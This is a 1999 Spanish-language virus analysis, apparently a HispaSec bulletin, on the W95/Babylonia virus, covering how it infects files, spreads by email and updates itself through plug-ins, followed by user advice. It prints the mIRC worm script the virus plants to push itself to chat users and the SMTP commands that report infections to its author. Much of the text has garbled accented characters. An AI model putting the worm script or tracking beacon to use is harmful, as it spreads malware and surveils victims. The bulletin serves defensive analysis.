Acaba de salir a la luz «Babylonia», el primer virus del mundo capaz de autoactualizarse por Internet por medio de «plug-ins». Un agente infeccioso que, por si lo anterior fuera poco, reúne las habilidades de un i-worm en cuanto a su distribución, de un virus en cuanto a la infección de ficheros, y de un troyano de «backdoor» en lo que a las mencionadas actualizaciones se refiere.
El origen de «Babylonia», que ha causado multitud de infecciones en sus primeras horas de difusión por la red, se remonta al grupo de noticias «alt.crackers», cuando el 3 de diciembre fue enviado como fichero adjunto, bajo el nombre «serialz.hlp», en un mensaje con el que se ofrecía a los asiduos una recopilación de 17000 números de serie para registrar de manera ilegal multitud de aplicaciones para Windows de carácter comercial.
Lo que en realidad sucede al abrir este fichero de ayuda es que el virus «Babylonia» es ejecutado, y así, éste procede a infectar los ficheros EXE de formato PE (Portable Executable) y HLP (archivos de ayuda de Windows), siempre que la plataforma en la que se est’n llevando a cabo estas acciones sea Windows95 o 98, ya que, debido a que parte del c¢digo v¡rico corre bajo «ring-0» (el anillo de prioridad m xima de ejecuci¢n) por medio de llamadas a la funci¢n API indocumentada «VxDCall», este esp’cimen restringe su campo de acci¢n dejando fuera a aquellas m quinas que corren con WindowsNT.
El responsable de «Babylonia» es un conocido escritor de virus de origen brasile_o apodado «Vecna», ex-miembro de grupos como SGWW, de la ex-Uni¢n Sovi’tica, y de los espa_oles 29A. Este programador, cuya producci¢n para Windows es probablemente la m s extensa de un creador de virus independiente, ya dio que hablar tiempo atr s con espec¡menes tan complejos como «Inca» o «Cocaine», que hoy en d¡a siguen ocupando puestos de relativa significaci¢n en las listas oficiales de virus «in the wild».
Instalaci¢n
Tanto desde aplicaciones de formato PE como desde ficheros HLP, el primer paso del virus consiste en obtener la direcci¢n real de las APIs necesarias para su correcta ejecuci¢n, momento a partir del cual «Babylonia» procede a saltar a ring-0 para as¡, por medio de la redirecci¢n de los servicios IFS (acceso a disco) dedicados a la apertura, lectura o modificaci¢n de atributos y renombramiento de ficheros, infectar tantas aplicaciones como sea posible. Durante el proceso de instalaci¢n en memoria, el virus comprueba la presencia de los monitores antivirus «Spider» (DrWeb) y «AVP» y, en caso de encontrarse activos, intenta parchearlos de manera que les resulte imposible abrir ficheros susceptibles de ser escaneados. De acuerdo con Eugene Kaspersky, debido a un «bug» el virus es incapaz de dejar al «AVP Monitor» fuera de combate, de manera que acaba por desechar la instalaci¢n de su c¢digo en memoria.
De manera paralela, «Babylonia» descomprime, por medio del m’todo «apLib», una aplicaci¢n adicional contenida en su c¢digo, de 4k de longitud en total, cuyo c¢digo inyecta en un nuevo fichero que el virus crea en el directorio ra¡z con el nombre «BABYLONIA.EXE». Y es precisamente aqu¡ donde radica la mayor particularidad de este esp’cimen, ya que ‘ste es el componente que permite la instalaci¢n de los «plug-ins» v¡ricos. Cuando este portador es ejecutado, su funcionamiento consiste en autorregistrarse como un proceso oculto, copiarse a s¡ mismo como «KERNEL32.EXE» en el directorio de sistema de Windows, y asegurarse, por medio de la inserci¢n del nombre de esta copia en el registro de configuraciones, de ejecutarse y as¡ mantenerse residente en memoria en cada arranque del ordenador.
Propagaci¢n
Una vez que «Babylonia» ha «aterrizado» en un ordenador, vemos que su proceso de propagaci¢n sigue dos caminos: por un lado, el de la infecci¢n de ejecutables y ficheros de ayuda en modo local, y por otro, la difusi¢n por medio de Internet como fichero adjunto a los mensajes salientes de una m quina infectada.
La infecci¢n de ejecutables afecta a todos los ficheros de formato PE y extensi¢n EXE que son accedidos por medio de las funciones IFS anteriormente enumeradas cuando «Babylonia» se encuentra residente en memoria. Tras una serie de comprobaciones a partir de los datos que se pueden encontrar en la cabecera PE tales como el procesador bajo el cual est dise_ada para funcionar la aplicaci¢n «v¡ctima» o la existencia de atributos de DLL, el virus determina si el fichero debe ser infectado o no. El m’todo empleado es el del «entry-point obscuring» (EPO), mediante el cual se examina el c¢digo del archivo a infectar en busca de una instrucci¢n «call», la cual es parcheada para llamar directamente al c¢digo v¡rico, en lugar de modificar el punto de entrada original de la aplicaci¢n. Tras esto, el cuerpo del virus es «colgado» de la oltima secci¢n del fichero, salvo en caso de que exista una secci¢n con relocaciones, la cual pasar¡a a ser directamente sobreescrita, evitando as¡ el crecimiento en bytes del tama_o de las aplicaciones infectadas.
Por su parte, la infecci¢n de ficheros de ayuda afecta a todos los archivos de extensi¢n «HLP». El m’todo de infecci¢n es muy similar al del virus «WinHLP.Demo»: por medio de un script polim¢rfico que el virus inserta en la secci¢n «SYSTEM» y del uso indocumentado de la API «EnumWindows», «Babylonia» consigue que su c¢digo binario se ejecute cada vez que un fichero de ayuda es abierto a partir de la «aplicaci¢n madre» encargada de dicha tarea, «WINHELP.EXE».
Ya por oltimo, la propagaci¢n por e-mail presenta pocas novedades con respecto a la que ya hemos visto «gracias» a otros i-worms en este mismo servicio de noticias. As¡, la misi¢n del virus consiste en localizar el m¢dulo «WSOCK32.DLL» y de parchear la API «send», con el objetivo de monitorizar todo lo que el usuario env¡a en sus conexiones a Internet. Cuando se trata de un e-mail, a diferencia de otros i-worms, «Babylonia» se limita a adjuntar simplemente una copia de su c¢digo, independientemente de si el mensaje saliente ya lleva originalmente algon «attach». Por si esto fuera poco, y con el fin de asegurarse la compatibilidad con cualquier cliente de correo, el virus dispone de sus propias rutinas de codificaci¢n para formato UUencode y MIME, una caracter¡stica sin precedentes en los i-worms que conocemos hasta el momento.
El nombre y el icono de los ficheros a_adidos por «Babylonia» a los e-mails enviados por el usuario deber¡an ser distintos dependiendo de la fecha interna de cada ordenador, y as¡, su autor prepar¢ una serie de iconos y nombres de fichero en funci¢n de las distintas celebraciones o festividades que tienen lugar a lo largo del a_o, tales como Navidades, Pascua o Halloween. Sin embargo, y de acuerdo con Eugene Kaspersky, debido a un «bug» el nombre siempre resulta ser «X-MAS.EXE», y el icono, una cara sonriente de Pap No%l, de manera que la identificaci¢n del virus en el momento de su llegada a nuestro ordenador se simplifica al m ximo. Una vez que el fichero portador del virus es ejecutado, y como ya es costumbre entre la inmensa mayor¡a de los i-worms conocidos hasta el momento, la atenci¢n del usuario es desviada por medio de un par de cuadros de di logo que advierten de un error que en realidad no ha tenido lugar. En el caso de «Babylonia», los mensajes son ‘stos, donde la «xx» del segundo es «95» o «NT», optando siempre por la alternativa que sea distinta a la versi¢n del sistema operativo que posea el usuario que acaba de ejecutar el i-worm:
Loader Error API not found!
Loader Error Windows xx required! This program will be terminated.
Actualizaci¢n
Sin duda, el aspecto m s interesante y m s peligroso de este virus radica en su capacidad de actualizarse por medio de Internet. De este modo, su autor puede a_adir, quitar o cambiar cualquier rutina o habilidad de su virus, de manera remota, y as¡ hacer que todas las copias de ‘ste se actualicen e incorporen nuevas tecnolog¡as, que podr¡an inclu¡r, entre otras, la destrucci¢n de datos de un ordenador infectado, haciendo que «Babylonia» funcionase como un mero int’rprete de las ¢rdenes de su autor.
La t’cnica consiste en monitorizar la presencia de la aplicaci¢n «RNAAPP.EXE», correspondiente al acceso telef¢nico a redes, de manera que el virus se asegura de que el usuario est a punto de iniciar una conexi¢n a Internet. A partir de aqu¡, «Babylonia» se dispone a contactar con «sok4ever.zone.ne.jp/vecna», direcci¢n de la que descarga el fichero «virus.txt», que contiene la relaci¢n de «plug-ins» que el autor ha ido a_adiendo de manera peri¢dica para su proyecto. De acuerdo con la informaci¢n manejada por HispaSec, «SOK4EVER» es la continuaci¢n de «Sources Of Kaos», un servidor de hospedaje gratuito para p ginas web con contenidos relacionados con el mundo de los virus inform ticos, que fue eliminado por el FBI tras el revuelo causado por la aparici¢n del virus «Melissa».
Segon acabamos de comprobar, el propio webmaster de «SOK4EVER» ha decidido dar de baja de manera fulminante la cuenta del escritor brasile_o Vecna, al percatarse del uso que ‘ste estaba haciendo de su servidor por medio de «Babylonia», de manera que cualquier opci¢n de ‘ste de seguir actualiz ndose queda descartada de modo tajante, al serle imposible de ahora en adelante dar con la cuenta de su autor, a partir de la cual obten¡a los «plug-ins» necesarios.
En cualquier caso, en el momento en el que el virus fue descubierto se localizaron cuatro «plug-ins» que con toda probabilidad habr n sido activados en la inmensa mayor¡a de las m quinas infectadas por «Babylonia». De acuerdo con lo que hemos podido comprobar, estos ficheros poseen un simple formato, compuesto por una cabecera de identificaci¢n («VMOD», que significar¡a Virus/Vecna MODule) y una referencia a la direcci¢n de inicio de la rutina principal del c¢digo a incorporar al virus. Veamos cu l es el cometido de cada uno de estos «plug-ins» que el autor ha conseguido «lanzar».
DROPPER.DAT: se limita a comprobar si, aon estando el actualizador v¡rico activo, «Babylonia» no ha infectado todav¡a el sistema en que se est ejecutando. En caso afirmativo, el virus procede a correr una aplicaci¢n de 17k llamada «INSTALAR.EXE», que activa el virus y se borra a s¡ misma tras haber sido ejecutada.
IRC-WORM.DAT: convierte el virus en un gusano de mIRC con aspecto de parche «Y2K», tras localizar el conocido cliente de IRC en el disco duro de la m quina remota e insertar el siguiente c¢digo, por medio del cual se env¡a a todos los usuarios de un canal en el que se encuentre un usuario infectado:
[script] n0=run $mircdir2kBug-MircFix.EXE n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt } n2= /dcc send $nick $mircdir2kbugfix.ini n3= /dcc send $nick $mircdir2kBug-MircFix.EXE n4=}
POLL.DAT: env¡a al autor del virus un e-mail, de manera que ‘ste pueda efectuar un seguimiento de las infecciones que su virus va produciendo a lo largo de Internet. Los comandos enviados por el puerto 25 (SMTP) son los siguientes:
HELO rasta.net
MAIL FROM: babylonia@rasta.net
RCPT TO: babylonia_counter@hotmail.com
[…]
El cuerpo de los mensajes contiene una frase en portugu’s: «Quando o mestre chegara?», que significa «¨Cu ndo llegar el maestro?», lo que nos hace pensar que el autor se preparaba algon «payload» poco agradable para un futuro no muy lejano y que, por suerte, no llegar a verse consumado.
GREETZ.DAT: se limita a modificar el fichero «AUTOEXEC.BAT» con una serie de agradecimientos del autor a otros componentes de la escena v¡rica, incluyendo al webmaster de «SOK4EVER», quien, como ya hemos comentado, ha dado de baja al autor de «Babylonia» de su servidor. El texto a_adido es el siguiente:
echo W95/Babylonia by Vecna (c) 1999
echo Greetz to RoadKil and VirusBuster
echo Big thankz to sok4ever webmaster
echo Abracos pra galera brazuca!!!
echo —
echo Eu boto fogo na Babilonia!
Consejos
Volvemos a remitirnos a las ya cl sicas recomendaciones de no abrir o ejecutar ningun archivo que no hayamos solicitado, aon si ‘ste proviniese de fuentes de confianza. Asimismo, recordamos que deben descargar los parches «Y2K» desde las webs corporativas, segon su aplicaci¢n o sistema. Por oltimo, y no menos importante, se aconseja actualizar los ficheros de firma de los antivirus, especialmente durante estos meses, ya que la llegada del nuevo a_o parece ser el origen de una ola de nuevos espec¡menes por lo se_alado de la fecha, y para aprovechar la confusi¢n que est provocando el efecto 2000.
Desde HispaSec vamos a realizar un seguimiento especial durante estas fechas, del que tendr n cuenta en los pr¢ximos d¡as. Instamos a todos nuestros lectores a hacernos part¡cipes de cualquier infecci¢n de la que puedan ser v¡ctimas, y a formar parte activamente del equipo de emergencia que estamos desplegando.
M s informaci¢n:
AVP-ES
http://www.avp-es.com/noticias/babylonia.html
